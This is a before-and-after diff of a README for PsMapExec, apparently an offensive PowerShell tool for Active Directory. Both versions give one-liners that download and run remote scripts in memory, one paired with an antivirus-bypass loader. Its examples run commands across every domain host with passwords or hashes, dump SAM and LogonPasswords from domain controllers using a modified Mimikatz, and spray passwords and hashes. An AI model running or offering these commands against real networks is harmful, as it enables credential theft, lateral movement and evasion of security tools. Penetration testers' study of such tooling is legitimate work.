psmapexec/README.md, before:

# 🔵 PsMapExec

<figure><img src="../.gitbook/assets/279332478-14770c85-b751-4127-8261-2e49ff25a8ad.png" alt="" width="375"><figcaption></figcaption></figure>

**Get it on GitHub:** [https://github.com/The-Viper-One/PsMapExec](https://github.com/The-Viper-One/PsMapExec)

**Load directly into memory and attempt to bypass AV**

```powershell
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
```

**Load directly into memory:**

```powershell
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
```

## General Usage

The general usage of PsMapExec is to define the following:

**Command** - (Optional) execute commands against the target\
**Force** - Used to override the warning message preventing the script from executing when domain Administrator or Enterprise Administrator credentials are provided\
**Hash** - Used for authentication. You can supply either a hash or a password.\
**LocalAuth** - Uses local account credential for authentication. Currently only for WMI and RDP\
**Method** - How to authenticate against the hosts\
**Module** - If any modules need to be run against the target\
**Password** - Used for authentication\
**ShowOutput** - Shows command output when using modules.\
**SuccessOnly** - Shows only hosts for which we can successfully authenticate to\
**Targets** - Which targets we cant to run against\
**Threads** - Specify the number of concurrent runspaces to execute (Default 8)                             **Ticket** - Suppy a Base64 Kerberos ticket as authentication\
**Username** - Domain user for which we wish to authenticate against the targets

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).

Generally, you can mix and match various parameters across different methods and modules.

## Dependencies

PsMapExec has some dependencies that need to be pulled from outside the script itself in order to function.

Primarily these are:

* Kirby (PowerShell based Kerberos ticket dump)
* Invoke-Pandemonium (Slightly modified Mimikatz)

{% hint style="info" %}
There are plans to ensure long term that PsMapExec requires no external dependencies, however this requires the script to be massively reduced and AV bypasses to be considered.
{% endhint %}

Currently, they are pulled from a seperate GitHub repository: [https://github.com/The-Viper-One/PME-Scripts](https://github.com/The-Viper-One/PME-Scripts)

If you are working within an environment that has no external access or GitHub is blocked by a firewall you will need to clone the scripts in the respository onto the system from which PsMapExec is running from.\
\
PsMapExec does not currently host a HTTP server for these so you will need to use something like HFS: [https://www.rejetto.com/hfs/?f=dl](https://www.rejetto.com/hfs/?f=dl)

PsMapExec supports pointing to a locally or alternatively hosted server for the script dependencies.

```powershell
PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
```

## Examples

Execute WMI commands over all systems in the domain using password authentication

```
PsMapExec -Username Admin -Password Pass -Targets All -Method WMI -Command "net user"
```

Execute WinRM commands over all systems in the domain using hash authentication

```
PsMapExec -Username Admin -Hash [Hash] -Targets All -Method WinRM -Command "net user"
```

Check RDP Access against workstations in the domain

```
PsMapExec -Username Admin -Password Pass -Targets Workstations -Method RDP
```

Dump SAM on all servers in the domain using SMB

```
PsMapExec -Username [User] -Hash [Hash] -Targets Servers -Method SMB -Module SAM
```

Check SMB Signing on all domain systems

```
PsMapExec -Targets All -Method GenRelayList
```

Dump LogonPasswords on all Domain Controllers over SMB

```
PsMapExec -Username Admin -Password Pass -Targets DCs -Method SMB -Module LogonPasswords
```

Commit message:

GITBOOK-2955: change request with no subject merged in GitBook

psmapexec/README.md, after:

# 🔵 PsMapExec

<figure><img src="../.gitbook/assets/279332478-14770c85-b751-4127-8261-2e49ff25a8ad.png" alt="" width="375"><figcaption></figcaption></figure>

**Get it on GitHub:** [https://github.com/The-Viper-One/PsMapExec](https://github.com/The-Viper-One/PsMapExec)

**Load directly into memory and attempt to bypass AV**

```powershell
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
```

**Load directly into memory:**

```powershell
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
```

## General Usage

### Mandatory Parameters

### General Parameters

<table><thead><tr><th width="199">Parameter</th><th width="112">Value</th><th>Description</th></tr></thead><tbody><tr><td>-Command</td><td>whoami</td><td>Runs the specified command on the remote system</td></tr><tr><td>-CurrentUser</td><td>N/A</td><td>Instructs PsMapExec to run in current user context. This is default when no other credentials are specified</td></tr><tr><td>-Domain</td><td>[Domain]</td><td>Specifies what domain to run against. Otherwise the current user domain is used</td></tr><tr><td>-DomainController</td><td>[DC]</td><td>Specifies what Domain controller to authenticate against</td></tr><tr><td>-Force</td><td>N/A</td><td>Used to force PsMapExec to run when domain or enterprise admin credentials are used</td></tr><tr><td>-LocalFileServer</td><td>[IP]</td><td>Pull scripts from specified local file server address</td></tr><tr><td>-Module</td><td>[Module]</td><td>Specifies the module to be used for command execution</td></tr><tr><td>-NoBanner</td><td>N/A</td><td>Surpresses the script banner</td></tr><tr><td>-NoParse</td><td>N/A</td><td>Surpresses parsing of some module outputs</td></tr><tr><td>-SuccessOnly</td><td>N/A</td><td>Shows only successful results</td></tr><tr><td>-Timeout</td><td>[int]</td><td>Sets the port scan timeout (ms) against the specified method.</td></tr><tr><td>-Threads</td><td>[int]</td><td>Sets the concurrent executions jobs to run (Default:30)</td></tr></tbody></table>



### Authentication Parameters

<table><thead><tr><th width="156">Parameter</th><th width="235">Value</th><th>Description</th></tr></thead><tbody><tr><td>-Hash</td><td>[RC4] or [AES256]</td><td>Hash value. Must be supplied with -Username</td></tr><tr><td>-LocalAuth</td><td>N/A</td><td>Used to specify when local account authentication should be used</td></tr><tr><td>-Password</td><td>[Password]</td><td>Password value. Must be suplied with -Username</td></tr><tr><td>-Ticket</td><td>[Ticket] or [Path to ticket]</td><td>B64 encoded Kerberos ticket to use for authentication. -Username is not required</td></tr></tbody></table>

### Command execution Parameters



<table><thead><tr><th width="226">Parameter</th><th width="129">Value</th><th>Description</th></tr></thead><tbody><tr><td>-Command</td><td>[Command]</td><td>Runs the specified command on the remote system</td></tr><tr><td>-Module</td><td>[Module]</td><td>Specifies the module to be used for command execution</td></tr><tr><td>-ShowOutput</td><td>N/A</td><td>Displays output for executed modules. Commands will still be shown</td></tr></tbody></table>

### Spraying Parameters

<table><thead><tr><th width="217">Parameter</th><th width="166">Value</th><th>Description</th></tr></thead><tbody><tr><td>-AccountAsPassword</td><td>N/A</td><td>Sprays SAM Account name values as passwords</td></tr><tr><td>-EmptyPassword</td><td>N/A</td><td>Sprays "blank" passwords</td></tr><tr><td>-SprayHash</td><td>[RC4] or [AES256]</td><td>Hash value to be used for hash spraying</td></tr><tr><td>-SprayPassword</td><td>[Password]</td><td>Password value to be used for hash spraying</td></tr></tbody></table>

###

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).

Generally, you can mix and match various parameters across different methods and modules.

## Dependencies

PsMapExec has some dependencies that need to be pulled from outside the script itself in order to function.

Primarily these are:

* Kirby (PowerShell based Kerberos ticket dump)
* Invoke-Pandemonium (Slightly modified Mimikatz)

{% hint style="info" %}
There are plans to ensure long term that PsMapExec requires no external dependencies, however this requires the script to be massively reduced and AV bypasses to be considered.
{% endhint %}

Currently, they are pulled from a seperate GitHub repository: [https://github.com/The-Viper-One/PME-Scripts](https://github.com/The-Viper-One/PME-Scripts)

If you are working within an environment that has no external access or GitHub is blocked by a firewall you will need to clone the scripts in the respository onto the system from which PsMapExec is running from.\
\
PsMapExec does not currently host a HTTP server for these so you will need to use something like HFS: [https://www.rejetto.com/hfs/?f=dl](https://www.rejetto.com/hfs/?f=dl)

PsMapExec supports pointing to a locally or alternatively hosted server for the script dependencies.

```powershell
PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
```

## Examples

Execute WMI commands over all systems in the domain using password authentication

```powershell
PsMapExec -Username Admin -Password Pass -Targets All -Method WMI -Command "net user"
```

Execute WinRM commands over all systems in the domain using hash authentication

```powershell
PsMapExec -Username Admin -Hash [Hash] -Targets All -Method WinRM -Command "net user"
```

Check RDP Access against workstations in the domain

```powershell
PsMapExec -Username Admin -Password Pass -Targets Workstations -Method RDP
```

Dump SAM on all servers in the domain using SMB

```powershell
PsMapExec -Username [User] -Hash [Hash] -Targets Servers -Method SMB -Module SAM
```

Check SMB Signing on all domain systems

```powershell
PsMapExec -Targets All -Method GenRelayList
```

Dump LogonPasswords on all Domain Controllers over SMB

```powershell
PsMapExec -Username Admin -Password Pass -Targets DCs -Method SMB -Module LogonPasswords
```
